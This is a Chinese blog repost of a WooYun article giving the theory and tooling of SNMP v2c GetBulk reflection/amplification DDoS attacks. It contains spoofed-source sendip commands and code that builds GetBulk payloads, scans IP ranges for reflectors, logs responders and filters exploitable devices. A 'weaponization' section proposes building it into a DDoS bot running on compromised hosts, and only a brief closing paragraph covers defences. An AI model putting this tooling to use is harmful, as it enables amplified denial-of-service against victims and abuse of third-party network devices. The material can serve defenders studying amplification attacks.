基于snmp的反射攻击的理论及其实现

最新推荐文章于 2024-08-01 15:18:25 发布
最新推荐文章于 2024-08-01 15:18:25 发布
阅读量3.5k 收藏 2
点赞数 2
分类专栏: 网络安全 文章标签: 网络

原文地址:http://drops.wooyun.org/tips/2106

只做收藏和学习之用


0x00前言

当时dns反射攻击爆发的时候,我就开始研究snmp的反射攻击(实际可以达到20倍的放大效果),在2013年夏天就已经理论研究完成,后来实现工具化。最后还差规模化(武器化)。其实,是国外在2013年初,就有只言片语叙述snmp的反射攻击,但是没有一篇完整的文章,最近在微博上看到很多朋友转载国外的信息,我觉得,如果再不把自己所研究的放出来刷刷存在感,让我这个rank9的人活不下去了。

0x01背景

罗嗦了这么多,进入正题。

首先反射攻击的基础是向有缺陷的目标发送精心构造的伪造源ip地址的udp包来实现。第二,需要主机和缺陷主机之间有大小不对等的信息交换。一般满足这两个条件就可以来实现反射攻击。

0x02理论

Snmp就不过多介绍了,大家可以百度。Snmp有3个版本,这里攻击最理想的是2c版本,而恰恰2c版本也是应用最广的。

在bt5下可以用snmpwalk或snmpget命令来和snmp主机进行交换数据。

Snmpwalkc public –v2c IP oid

这里oid是获取snmp具体信息内容的一个标识,snmp里面存的信息是一个树状的信息结构。

2014052716250940920.jpg

其实snmpwalk是获取一条oid信息,但是这个oid里面附带了下一个树节点的oid号,然后snmp会通过 snmpget继续访问下一个oid号(在getnext字段里面),来执行一个类似于循环的行为,但是snmpget的协议大家也看到了,只能获取到一条信息,79的信息长度,只能获得279的反馈,这样实现攻击的放大倍数是不给力的。

关键点来了,根据rfc1441-rfc1452文档说明,snmp第二版里面引入了getbulk来取代反复getnext,用来更好的在单个请求里面获得大量的管理数据。相对应的bt5下还有个snmpbulkget命令

snmpbulkget -v2c -Cn0 -Cr70 -c public IP oid

对应就是获取当前oid后面的70个团体字,这样如果你用snmpwalk跑一个1.3.6的团体字会看到很多信息,而你用bulkget这个一次就可以收到一个包里面包含70条信息的数据包,如图。

2014052716263586576.jpg

这里看到数据包的length大家就会明白了,就是利用这种方式,来获得反射攻击的效果。

这里大家会有个疑问。一个snmp里面会包含n多的信息(上千条肯定有了)为什么这里只用70条,用更多的会返回更多的信息,获得更大的倍数。当然我也想,这么做,可是snmp这协议不想ntp协议直接给你把数据分包返回,而是通过一个包里的不同字段返回多个信息的,所以这里面就会受到网络链路上的mtu这个值的影响,1500这个硬伤是不能越过去的。理论上已经实现了信息不对等的交互了,那么下面就是伪造源ip发udp包的环节了。

此处我用的是sendip这个工具,安装很简单http://www.earth.li/projectpurple/progs/sendip.html

下载源码之后直接在linux下编译安装,这其中可能会遇到编译问题,请参考这里http://blog.csdn.net/figo1986/article/details/7336131

下面看下我用的命令

sendip -v -p ipv4 -is src_IP -id dst_IP -p udp -us 8000 -ud 161 dst_IP  -d0x123456789

这里是使用ipv4的协议发送udp包,src_IP 源ip, dst_ip 目的ip,-us udp源端口,-ud udp目的端口,这里snmp默认端口是161,源端口自己随便填,最后部分是数据部分,其实可以直接输入明文的,但是snmp的pdu编码是非常蛋疼的,所以我使用了-d 16进制的形式。

下面是效果,这个包就发到本地吧,这里的源地址就是ddos的反射攻击的被攻击者的地址。

2014052716275084302.jpg

这里看到了效果,为下一步工具化进行了铺垫

最后这个图是虚拟机环境搭的,实现反射攻击的整体图

2014052716283040757.jpg

0x03工具化

首先要解决snmp数据包pdu部分的蛋疼的编码部分,snmp的数据部分是符合基本编码规则(ber)的这里有三篇文章,大家可以完全读懂ber编码和snmp的关系。

http://blog.csdn.net/shanzhizi/article/details/11574849
http://yuanmuqiuyu2000.blog.sohu.com/72641116.html

http://blog.chinaunix.net/uid-23069658-id-3251045.html

对于这个蛋疼的编码,我写了个java程序来生成pdu,里面有注释,大家很好理解的。

import java.io.UnsupportedEncodingException;

public class SnmpPDUber {
    public static String sumlen(String s){
	int c=0;
	String r="";
	String r2="";
	s=qukongge(s);
	s=s.replaceAll(" ","+");
	r=s.replaceAll("\\+","");
	//System.out.println(s);
	c=r.length()/2;
	r2=Integer.toHexString(c);	     //十进制转换成16进制返回
	return subStr(r2);
    }

    public static String randomtohex(int i) //产生 i 组 16进制 随机数
    {
	String s="";
	int k;
	for(int j=0;j<i;j++){
	k=(int)(1+Math.random()*(254-1+1));
	    s=s+Integer.toHexString(k)+" ";
	}
	return s;
    }

    public static String subStr(String s)	 // (双位) 0变成00
    {
	if(s.length()%2==1){
	    s="0"+s;
	}
	return s;

    }
    public static String qukongge(String s){return s.replaceAll(" ","");} //去除空格

    public static String toHexString(String s)
    {
	String str="";
	for (int i=0;i<s.length();i++)
	{
	    int ch = (int)s.charAt(i);
	    String s4 = Integer.toHexString(ch);
	    str = str +" "+ s4;
	}
	return str;
    }
    public static void main(String args[]){
	// tag+len+values
	String tag="30";//tag标识域 SEQUENCE类型
	String len="00";
	String values="";//values值域

	String versiontag="02";//version tag标识域 INTEGER类型
	String versionlen="01";
	String versionvalues="01";//version values 00 1版本     01 2c版本

	String Communitytag="04";//Community tag标识域 string类型
	String Communitylen="00";//Community len长度域
	String Communityvalues=args[0];//Community 值域public
	System.out.println(Communityvalues);
	Communityvalues=toHexString(Communityvalues);
	System.out.println(Communityvalues);

	String pdutag="a5";//pdu tag 标识域 a5 是 getbulkrequest
	String pdulen="00";//pdu len长度域
	String pduvalue="";//pdu 值域

	String requestid_tag="02";//requestid tag 标识域 INTEGER类型
	String requestid_len="04";//requestid len 长度域
	String requestid_values="";//8位 16进制 随机   ID

	String non_repeaters_tag="02";// getbulk 开始段 标识域
	String non_repeaters_len="01";
	String non_repeaters_values="00";//16进制0

	String max_repeaters_tag="02";// getbulk 循环段 标识域
	String max_repeaters_len="01";
	String max_repeaters_values="64";// 16进制100

	String Variable_tag="30";
	String Variable_len="00";
	String Variable_value="";

	String Item_tag="30";
	String Item_len="00";
	String Item_values="";

	String Object_tag="06";
	String Object_len="00";
	String Object_values="2b 06 01 02 01";//1.3.6.1.2.1

	String value_tag="05";//no error 标识域
	String value_len="00";

	/*
	tag+len+[versiontag+versionlen+versionvalues+Communitytag+Communitylen+Communityvalues+pdutag+pdulen+[requestid_tag+requestid_len+requestid_values+non_repeaters_tag+non_repeaters_len+
	non_repeaters_values+max_repeaters_tag+max_repeaters_len+max_repeaters_values+Variable_tag+Variable_len+[Item_tag+Item_len+[Object_tag+Object_len+Object_values+value_tag+value_len]]]]
	*/
	String tmp="";
	int j=0;
	tmp=value_tag+" "+value_len;
	Object_len=sumlen(Object_values);
	Item_values=Object_tag+" "+Object_len+" "+Object_values+" "+tmp;
	Item_len=sumlen(Item_values);
	Variable_value=Item_tag+" "+Item_len+" "+Item_values;
	Variable_len=sumlen(Variable_value);
	tmp=Variable_tag+" "+Variable_len+" "+Variable_value;
	requestid_values=randomtohex(4); //报文随机id后面自带空格,所以下面字符串拼接时候不需要带空格
	pduvalue=requestid_tag+" "+requestid_len+" "+requestid_values+non_repeaters_tag+" "+non_repeaters_len+" "+non_repeaters_values+" "+max_repeaters_tag+" "+max_repeaters_len+" "+max_repeaters_values+" "+tmp;
	pdulen=sumlen(pduvalue);
	tmp=pdutag+" "+pdulen+" "+pduvalue;
	Communitylen=sumlen(Communityvalues);
	values=versiontag+" "+versionlen+" "+versionvalues+" "+Communitytag+" "+Communitylen+" "+Communityvalues+" "+tmp;
	len=sumlen(values);
	tmp=tag+" "+len+" "+values;
	System.out.println(tmp);
	System.out.println("0x"+qukongge(tmp));
	/*sendip -v -p ipv4 -is 192.168.1.101 -id 192.168.1.102 -p udp -us 8000 -ud 161 192.168.1.102 -d0x302602010104067075626c6963a519020440d32d10020100020164300b300906052b060102010500*/

    }
}

注意:getbulk的循环字段就是对应 snmpbulkget 里面的 –Cr 标识位。

第二为了有一定数量的能进行反射的主机,需要一个给力的扫描器,这里会有人想到用zmap来扫描,但是要知道, udp的扫描可不像tcp那种你发请求连接就肯定会有返回连接的,实测有很多udp程序只要你发的数据不符合他接收的格式时,他是无任何反应和回复的,就和这个ip没开相关端口是一样的效果,snmp也是符合这种情况的,所以需要自己在扫描指定ip的时候发送和正常snmp请求的包一样的数据包,来期盼正常的返回,来证明这个ip是否可以用来反射攻击。不知道大家住没注意到zmap是在不久之前才推出了snmp的扫描模块,这个模块我用过,不是太给力。下面是我用python写的一个循环调用sendip发包的程序,来扫描ip段的,里面的pdu是用刚才java编码程序生成出来的。发出的包用一个自写的java程序监听端口,如果有返回信息,就把返回的ip地址输出到文件。

python 3.4版本的

import os
import time
from pip.backwardcompat import raw_input

__author__ = 'qwe'

class ipScan(object):
	def __init__(self, begin, end):
		self.begin = begin
		self.end = end

	def traverseIP(self):
		begin_ip = []
		end_ip = []
		begin = self.begin.split(".")
		end = self.end.split(".")

		#print(begin,end)

		for m in begin:
			begin_ip.append(int(m))
		for n in end:
			end_ip.append(int(n))

		a1 = begin_ip[1]
		b1 = end_ip[1]
		a2 = begin_ip[2]
		b2 = end_ip[2]
		a3 = begin_ip[3]
		b3 = end_ip[3]

		print(a1,b1,a2,b2,a3,b3)

		for o in range(a1,b1+1):
			p=1
			q=1
			if(o==a1):
				p=a2
			else:
				p=1
			if(o==b1):
				q=b2
			else:
				q=254
			for m in range(a2, b2 + 1):
				i = 1
				j = 1
				if (m == a2 ):
					i = a3
				else:
					i = 1
				if (m == b2):
					j = b3
				else:
					j = 254
				for n in range(i, j + 1):
					ipstr=(str(begin_ip[0]) + "." + str(o) + "." + str(m) + "." + str(n))
					sendip='sendip -p ipv4 -is 192.168.0.108 -id '+ipstr+' -p udp -us 8450 -ud 161 '+ipstr+' -d0x302902010104067075626c6963a01c020461270b1b020100020100300e300c06082b060102010101000500'
					print(sendip)
					os.system(sendip)
					time.sleep(0.1)

begin = raw_input("enter begin ip addr: ")
end = raw_input("enter end ip addr: ")
#print (begin,end)

a = ipScan(begin, end)
a.traverseIP()

java监听程序

/**
 * Created with IntelliJ IDEA.
 * User: Clevo
 * Date: 14-3-11
 * Time: 下午10:09
 * To change this template use File | Settings | File Templates.
 */

import org.bouncycastle.asn1.ASN1InputStream;
import org.bouncycastle.asn1.ASN1Primitive;
import org.bouncycastle.asn1.util.ASN1Dump;

import java.io.ByteArrayInputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.net.*;

public class udpListen {

	public static void main(String[] args) {

			printReceiveInfomationFromPort(8000);

	}

	static void printReceiveInfomationFromPort(int port) {
		new Thread(new MonitorPortRunnable(port)).start();
	}

}

class MonitorPortRunnable implements Runnable {
	byte buf[] = new byte[1024];
	DatagramSocket ds = null;
	DatagramPacket dp = null;
	int localReceivePort ;
	public MonitorPortRunnable(int localReceivePort) {
		this.localReceivePort = localReceivePort;
	}
	public static void writefile2(String fileName, String content) {
		try {
			// 打开一个写文件器,构造函数中的第二个参数true表示以追加形式写文件
			FileWriter writer = new FileWriter(fileName, true);
			writer.write(content);
			writer.close();
		} catch (IOException e) {
			e.printStackTrace();
		}
	}
	public void run() {
		dp = new DatagramPacket(buf, 0, 1024);
		try {
			ds = new DatagramSocket(localReceivePort);

		} catch (SocketException e1) {
			//prompt("本地接收端口已被使用");
			System.exit(0);
		}
		while (true) {
			try {
				ds.receive(dp);
				//System.out.println("信息来自:" + this.localReceivePort);
			} catch (IOException e) {
				ds.close();
				e.printStackTrace();
			}
			byte[] c=dp.getData();
			int c_len=dp.getLength();
			String receiveMessage = new String(c, 0, c_len);
			String receiveAddr=new String(dp.getAddress().toString());
			//System.out.println(receiveMessage);//暂时打印到控制台,一般输出到文件
			System.out.println(receiveAddr);
			writefile2("result.txt",receiveAddr+"\r\n");
		}
	}


}

2014052716295083031.png

最后还有一个java写的结果过滤,其实就是一个snmp的信息获取程序,来筛选可利用的主机或者设备,大家可以增加更多的功能,例如看出口的速度等。

import java.io.*;
import java.util.Vector;

import org.snmp4j.CommunityTarget;
import org.snmp4j.PDU;
import org.snmp4j.Snmp;
import org.snmp4j.event.ResponseEvent;
import org.snmp4j.mp.SnmpConstants;
import org.snmp4j.smi.OID;
import org.snmp4j.smi.OctetString;
import org.snmp4j.smi.UdpAddress;
import org.snmp4j.smi.VariableBinding;
import org.snmp4j.transport.DefaultUdpTransportMapping;

public class SnmpDATAget {
	public static void main(String[] args) throws IOException, InterruptedException {
		Snmp snmp = new Snmp(new DefaultUdpTransportMapping());
		snmp.listen();

		//args[0]="public";
		//args[1]="ip.txt";
		//args[2]="oid.txt";

		CommunityTarget target = new CommunityTarget();
		target.setCommunity(new OctetString(args[0]));
		target.setVersion(SnmpConstants.version2c);
		target.setTimeout(3000);	//3s
		target.setRetries(1);	 //重试次数


		try {
			//String encoding="GBK";
			String encoding="UTF-8";
			File file=new File(args[1]);
			if(file.isFile() && file.exists()){ //判断文件是否存在
				InputStreamReader read = new InputStreamReader(
						new FileInputStream(file),encoding);//考虑到编码格式
				BufferedReader bufferedReader = new BufferedReader(read);
				String lineTxt = null;
				while((lineTxt = bufferedReader.readLine()) != null){
					System.out.print(lineTxt + "@");
					target.setAddress(new UdpAddress(lineTxt+"/161"));
					sendRequest(snmp, createGetPdu(args[2]), target);

				}
				read.close();
			}else{
				System.out.println("找不到指定的文件");
			}
		} catch (Exception e) {
			System.out.println("读取文件内容出错");
			e.printStackTrace();
		}


	}

	private static PDU createGetPdu(String path) {
		PDU pdu = new PDU();
		pdu.setType(PDU.GET);
		try {
			//String encoding="GBK";
			String encoding="UTF-8";
			File file=new File(path);
			if(file.isFile() && file.exists()){ //判断文件是否存在
				InputStreamReader read = new InputStreamReader(
						new FileInputStream(file),encoding);//考虑到编码格式
				BufferedReader bufferedReader = new BufferedReader(read);
				String lineTxt = null;
				while((lineTxt = bufferedReader.readLine()) != null){
					pdu.add(new VariableBinding(new OID(lineTxt))); //sysName
					//System.out.println(lineTxt);
				}
				read.close();
			}else{
				System.out.println("找不到指定的文件"+path);
			}
		} catch (Exception e) {
			System.out.println("读取文件内容出错");
			e.printStackTrace();
		}
		/*
		pdu.add(new VariableBinding(new OID("1.3.6.1.2.1.1.1.0")));
		pdu.add(new VariableBinding(new OID("1.3.6.1.2.1.1.2.0")));
		pdu.add(new VariableBinding(new OID("1.3.6.1.2.1.1.3.0")));
		 */
		return pdu;
	}

	private static void sendRequest(Snmp snmp, PDU pdu, CommunityTarget target)
			throws IOException {
		ResponseEvent responseEvent = snmp.send(pdu, target);
		PDU response = responseEvent.getResponse();

		if (response == null) {
			System.out.println("TimeOut...");
		} else {
			if (response.getErrorStatus() == PDU.noError) {
				Vector<? extends VariableBinding> vbs = response.getVariableBindings();
				for (VariableBinding vb : vbs) {
					System.out.println(vb + " ," + vb.getVariable().getSyntaxString());
				}
			} else {
				System.out.println("Error:" + response.getErrorStatusText());
			}
		}
	}

}

0x04武器化

这里面sendip可以作为一个模块集成到linux下面的ddos马里面。

好吧让大家失望了,从上面的各种杂牌程序大家不难看出,我是一个不会写程序的人,所以ddos的马部分默默地忽略掉吧,如果有大神会写,我们可以共同研究。

0x05局限性,防御办法和解决办法

第一,需要发包的肉鸡是属于纯外网ip地址,因为一般经过路由或者特殊设置(例如设置:忽略从lan口来的源ip地址不属于本子网的数据包)的三层交换时,此伪造包就会被过滤掉,从而失去效果。解决办法就是找那种可以发伪造包的肉鸡,其实还是很多的,简单点说nat形式为0的,基本都能发。这种肉鸡国外还是不少的。

第二,是混世魔王给我提出来的,能进行反射的主机的数量。这个还是很多的,因为不光有些有需要的linux开snmp,其实linux开snmp的基本都是内网的机器,用来进行性能监控用,更多的是网络上的设备,交换,路由,防火墙等,这些设备从小到大都会有开snmp的,他们所属的带宽大小也会有所不同,百兆千兆甚至万兆以太网口的设备都是会出现的。所以这方面能反射的主机数量不用担心。在上面工具化里面的扫描工具实践一下就可以看出来。

第三,防御办法,开snmp的主机尽量不要暴露在外网,还可以用改 默认密码来限制访问,或者改默认161端口。或者禁止响应bulkget的这种包,仅仅响应get方式获取

欢迎各位朋友来指正问题。


shangcx
关注
专栏目录
Kali linux 学习笔记(七十七)拒绝服务——SNMP 放大攻击 2020.4.15
闵行小鱼塘
04-15 648
本节学习SNMP 放大攻击
渗透理论概述
Auscoo111的博客
10-23 4722
渗透入门——术语概述 常见术语 渗透流程 明确目标——信息收集——漏洞探测——漏洞验证——编写报告 ——信息整理——获取所需——信息分析 脚本:动态网站(asp,php,jsp), linux, python 网站:静态网站(与后台交互比较少,如html) 动态网站(使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台lin...
SNMP放大攻击原理及实战演示
Jeromeyoung
03-20 4224
SNMP(Simple Network Management Protocol):简单网络管理协议 SNMP主要工作原理:通过一台客户端机器向一个被管理的设备发出查询请求获取这台设备当前运行状态的检测等情况,网络监控一般是基于SNMP与Agent。 即:向管理的目标发送指令进行配置设置;网络监控:网络运行状态的监视 在SNMP的服务中,(被监控设备)端口UDP 161为主动查询请求;162端...
SNMP——简单网络管理协议
最新发布
qq_53633989的博客
08-01 166
除了操作有增加之外,不同版本支持的数据类也不同:SNMPv2 增加了 Unsigned32 和 Counter64 两种新的数据类,Counter64 与 Counter32一样,都表示计数器,只能增加不能减少。当计数器增加到上限时回零,从头再增加。SNMPv2 规定计数器没有定义的初始值,所以只有连续两次读计数器得到的增加值才是有意义的。UnitsPartReferPartIndexPartDefValPartENDsnmpv2增加了UNITS子句,用文字说明与对象有关的度量单位。
谈谈反射
啊浪的博客
06-13 615
简介JAVA反射机制是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法;对于任意一个对象,都能够调用它的任意一个方法;简单说就是,只要给定类的名字,那么就可以通过反射机制来获得类的所有信息。原理Class文件由类装载器装载后,在JVM中将形成一份描述Class结构的元信息对象(Class反射对象),通过该元信息对象可以获知Class的结构信息。Class反射对象:描述类语义结构,可以...
Kali Linux系列之拒绝服务攻击(DOS)实战(上)
微信公众号:码奋
07-10 1750
​ (你的世界是个什么样的世界?你说,我们倾听!) ----------------- 小百科 拒绝服务攻击即是攻击者想办法让目标机器停止提供服务,是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使某些服务被暂停甚至主机死机,都属于拒绝服务攻击。拒绝服务攻击问题也一直得不到合理的解决,究其原因是因为网络协议本身的安全缺陷,从...
DDOS攻击分析
lefooter的博客
04-09 862
1 网络攻击 这一大类的攻击主要针对堵带宽的目标,从目标源上有两种形势,一种是攻击者伪造源IP进行流量攻击,基本上都是大数据包;另一种是反射放大攻击攻击者伪装受害者访问第三方,通过第三方的大量数据包响应来堵塞受害者的网络。 1.1 伪造大包攻击 伪造大包攻击通常需要攻击者控制的网络可以发送出相应攻击流量的数据包,攻击的同时也消耗自身的巨大资源,这样的攻击一般发生成攻击者自有IDC机房或拥有大量...
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9053
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络
端口渗透总结
Coisini的博客
06-13 1321
x00 背景 在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生; 首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e 这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我 再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的,所以平...
三万字,七十图详解计算机网络六十二问(建议收藏)
zhaohuodian的博客
08-26 849
为什么不能是两次?为了防止服务器端开启一些无用的连接增加服务器开销防止已失效的连接请求报文段突然又传送到了服务端,因而产生错误。由于网络传输是有延时的(要通过网络光纤和各种中间代理服务器),在传输的过程中,比如客户端发起了 SYN=1 的第一次握手。如果服务器端就直接创建了这个连接并返回包含 SYN、ACK 和 Seq 等内容的数据包给客户端,这个数据包因为网络传输的原因丢失了,丢失之后客户端就一直没有接收到服务器返回的数据包。...
火爆大厂的100道Java面试题及答案(2022年整理,持续更新) --网络协议篇
q1472750149的博客
12-28 3384
前言: 这是一个基本涵盖Java初中级大部分核心知识点的面试题集,包含了Java基础、容器、多线程、Spring、SpringBoot、MyBatis、Linux、MySQL、Redis、MongoDB、网络协议、JVM等方向。所有题目都是我亲自整理的。 因为无法生成自动跳转的目录,同时我也按照分类汇总整理成了PDF版,排版上相比更加整齐并且带有书签 阅读起来也比较方便全部。前前后后花费半个月的时间,共计24W字。 收藏的时候,顺便点个赞呗~ 收藏的时候,顺便点个赞呗~ 收藏的时候,顺便点个赞
SNMP放大攻击
分享学习网络的点点滴滴
11-09 259
○ 管理信息数据库(MIB)是一个信息存储库,包含管理代理中的有关配置和性能的数据,按照不同分类,包含分属不同组的多个数据对象。定义SNMPbulk,修改下面两个,看第一张图片修改即可,100的意思就是这个包重复100遍。○ 每一个节点都有一个对象标识符(OID)的唯一的标识。○ IETF定义标准的MIB库 / 厂家自定义MIB库。○ 服务端口 UDP 161 / 162。○ 请求流量小,查询结果返回流量大。SNMP只需要更改团体名即可。○ 定义community。● 安装SNMP服务。
snmp getbulk_使用SNMP GetBulk请求进行数据检索
cusi77914的博客
06-28 7762
IBM i 7.1和IBM i 7.2版本最近得到了增强,以为SNMP相关功能提供新功能。 这些新功能为IBM i客户提供了改进的性能和增强的可用性。 在本文中,我将讨论这些新的增强功能,并提供一个使用其中一些功能的编程示例。 本文的主要重点是使用GetBulk操作轻松地从标准SNMP表之一检索数据。 通过端口161发送SNMP响应 过去,IBM i通过UDP端口161接收SNMP请求...
[转]SNMP 原理及配置简述
angggggan的专栏
01-13 1695
转自:http://www.linuxfly.org/post/552/     随着机器数量的增长,管理员不能像过去那样,一台台机器进行监控、解决问题,而需要借助各方工具进行统一监控和管理。利用SNMP,一个管理工作站可以远程管理所有支持这种协议的网络设备,包括监视网络状态、修改网络设备配置、接收网络事件警告等。     在这里,我不想讲太多原理性的东西,网上有大堆的资料可以参考(附
浅谈SNMP(简单网络管理协议)采集设备配置信息
theUncle的博客
05-12 1万+
前段时间有幸接触到关于硬件交换机、存储器这块硬件方面的知识,然后去网上了解了一下怎么去获取设备的配置信息方面的知识 下面我就来简单谈谈自己的观点,还望大神多多指教,相互学习: 众所周知,机房内的各个设备都是需要通过IP网络来通信的,而SNMP是基于TCP/IP协议族的网络管理标准,是一种在IP网络中管理网络节点(如服务器、工作站、路由器、交换机等)的...
nessus漏扫修复记录
superbfly的专栏
11-10 2394
snmp SNMP Agent Default Community Name (public) 修改配置文件/etc/snmp/snmpd.conf将Public改成其他具有复杂度的字符串如Admin123...,保存后重新启动SNMP服务即可。 [root@localhost ~]# nmap -sU -p161 -script=snmp-brute 127.0.0.1 Starting Nmap 6.40 ( http://nmap.org ) at 2021-11-09 07:35 CST N
反射+注解
TT_4419的博客
12-08 616
      这篇文章主要是记录注解和反射的使用。网上的相关文档和参考资料有很多,在参考部分以及结合我们公司原本的注解的使用,我觉得可以记录一下,主要用于备忘。 1.定义注解:注解的定义很简单,直接在ecplies中可以直接定义。他的结构类似于定义interface。只不过加上了@符号。 我们先看一个简单的定义: 这里可以简单的看出来,注解的定义需要声明@interface,以及使用jav...
【安全牛学习笔记】SNMP放大攻击
edu_aqniu的博客
10-16 3100
SNMP放大攻击                                                              简单网络管理协议                                                              - Simple Network Management Protocol                  
SNMP getbulk参数说明
热门推荐
HTJOY1202的专栏
12-08 1万+
SNMPv2 defines the get-bulk operation, which allows a management application to retrieve a large section of a table at once. The standard get operation can attempt to retrieve more than one MIB obje
基于SNMP网络管理系统设计与实现
4. **SNMP (Simple Network Management Protocol)**: SNMP是一种广泛应用的网络管理协议,论文中提到的系统就是基于SNMP开发的。SNMP用于监视和控制网络设备,如服务器和路由器,提供CPU和内存利用率、进程状态等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值